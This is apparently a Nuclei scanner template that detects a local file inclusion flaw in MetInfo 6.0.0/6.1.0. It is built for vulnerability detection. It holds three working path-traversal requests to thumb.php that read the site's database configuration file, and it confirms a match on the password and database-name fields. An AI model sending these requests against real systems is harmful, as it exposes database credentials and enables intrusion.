id: metinfo-lfi
info:
  name: MetInfo 6.0.0/6.1.0 LFI
  author: pikpikcu
  severity: high
  reference: https://paper.seebug.org/676/
  description: A vulnerability in MetInfo allows remote unauthenticated attackers access to locally stored files and their content.
  tags: metinfo,lfi

requests:
  - method: GET
    path:
      - '{{BaseURL}}/include/thumb.php?dir=http/.....///.....///config/config_db.php'
      - '{{BaseURL}}/include/thumb.php?dir=.....///http/.....///config/config_db.php'
      - '{{BaseURL}}/include/thumb.php?dir=http\\..\\..\\config\\config_db.php'

    stop-at-first-match: true
    matchers-condition: and
    matchers:

      - type: word
        words:
          - "con_db_pass"
          - "con_db_name"
        part: body
        condition: and

      - type: status
        status:
          - 200
